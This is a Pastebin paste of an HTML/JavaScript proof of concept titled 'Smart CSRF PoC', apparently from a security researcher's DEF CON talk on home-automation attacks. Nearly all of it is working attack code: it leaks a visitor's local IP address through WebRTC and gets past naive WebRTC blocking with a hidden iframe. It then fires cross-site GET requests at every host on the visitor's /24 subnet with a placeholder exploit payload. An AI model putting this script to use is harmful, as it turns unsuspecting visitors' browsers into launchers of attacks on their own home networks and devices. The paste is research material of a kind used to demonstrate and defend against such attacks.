Guest User

Smart CSRF PoC

a guest
Sep 11th, 2015
418
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <HTML><TITLE>Smart CSRF PoC</TITLE>
  2. <!--
  3. The MIT License (MIT)
  4.  
  5. Copyright (c) 2015 Daniel Roesler
  6.  
  7. Permission is hereby granted, free of charge, to any person obtaining a copy
  8. of this software and associated documentation files (the "Software"), to deal
  9. in the Software without restriction, including without limitation the rights
  10. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  11. copies of the Software, and to permit persons to whom the Software is
  12. furnished to do so, subject to the following conditions:
  13.  
  14. The above copyright notice and this permission notice shall be included in all
  15. copies or substantial portions of the Software.
  16.  
  17. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  18. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  19. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  20. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  21. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  22. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
  23. SOFTWARE.
  24. -->
  25. <script>
  26. // Linkback: http://www.tripwire.com/state-of-security/off-topic/smart-csrf/
  27. // This code is derived from a PoC I came across on GitHub: https://github.com/diafygi/webrtc-ips/blob/master/README.md
  28. // I have only slightly modified it to assume the IP is on a /24 and iterate over the addresses with an HTTP request.
  29. // A version of this script including the payload for a 0-day in a home automation product was demonstrated at:
  30. //  DEF CON 23 IoT Village and InfoSec Europe 2015 Intelligent Defence in a talk titled 'Smart Home Invasion'
  31. // Interestingly enough, this code worked in Chrome even without an Internet connection to reach the STUN server.
  32. // -- Craig Young, Security Researcher Tripwire VERT
  33.  
  34. //get the IP addresses associated with an account
  35. function getIPs(callback){
  36.     var ip_dups = {};
  37.  
  38.     //compatibility for firefox and chrome
  39.     var RTCPeerConnection = window.RTCPeerConnection
  40.         || window.mozRTCPeerConnection
  41.         || window.webkitRTCPeerConnection;
  42.     var useWebKit = !!window.webkitRTCPeerConnection;
  43.  
  44.     //bypass naive webrtc blocking using an iframe
  45.     if(!RTCPeerConnection){
  46.         //NOTE: you need to have an iframe in the page right above the script tag
  47.         //
  48.         //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
  49.         //<script>...getIPs called in here...
  50.         //
  51.         var win = iframe.contentWindow;
  52.         RTCPeerConnection = win.RTCPeerConnection
  53.             || win.mozRTCPeerConnection
  54.             || win.webkitRTCPeerConnection;
  55.         useWebKit = !!win.webkitRTCPeerConnection;
  56.     }
  57.  
  58.     //minimal requirements for data connection
  59.     var mediaConstraints = {
  60.         optional: [{RtpDataChannels: true}]
  61.     };
  62.  
  63.     //firefox already has a default stun server in about:config
  64.     //    media.peerconnection.default_iceservers =
  65.     //    [{"url": "stun:stun.services.mozilla.com"}]
  66.     var servers = undefined;
  67.  
  68.     //add same stun server for chrome
  69.     if(useWebKit)
  70.         servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
  71.  
  72.     //construct a new RTCPeerConnection
  73.     var pc = new RTCPeerConnection(servers, mediaConstraints);
  74.  
  75.     function handleCandidate(candidate){
  76.         //match just the IP address
  77.         var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
  78.         var ip_addr = ip_regex.exec(candidate)[1];
  79.  
  80.         //remove duplicates
  81.         if(ip_dups[ip_addr] === undefined)
  82.             callback(ip_addr);
  83.  
  84.         ip_dups[ip_addr] = true;
  85.     }
  86.  
  87.     //listen for candidate events
  88.     pc.onicecandidate = function(ice){
  89.  
  90.         //skip non-candidate events
  91.         if(ice.candidate)
  92.             handleCandidate(ice.candidate.candidate);
  93.     };
  94.  
  95.     //create a bogus data channel
  96.     pc.createDataChannel("");
  97.  
  98.     //create an offer sdp
  99.     pc.createOffer(function(result){
  100.  
  101.         //trigger the stun server request
  102.         pc.setLocalDescription(result, function(){}, function(){});
  103.  
  104.     }, function(){});
  105.  
  106.     //wait for a while to let everything done
  107.     setTimeout(function(){
  108.         //read candidate info from local description
  109.         var lines = pc.localDescription.sdp.split('\n');
  110.  
  111.         lines.forEach(function(line){
  112.             if(line.indexOf('a=candidate:') === 0)
  113.                 handleCandidate(line);
  114.         });
  115.     }, 1000);
  116. }
  117.  
  118. getIPs(
  119.     function(ip){
  120.             var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./
  121.             if (local_regex.exec(ip) != null) {
  122.                 var subnet = local_regex.exec(ip)[0];
  123.                 for (node=1; node<256; node++) {
  124.                     var url = 'http://' + subnet + node + exploit_URI_payload;
  125.                     var oReq = new XMLHttpRequest();
  126.                     oReq.open("get",url,true)
  127.                     oReq.send();
  128.                 }
  129.             }
  130.         }
  131.     );
  132. </script>
  133. <H1>o0o0o0o0o0o0</H1>
  134. </HTML>
RAW Paste Data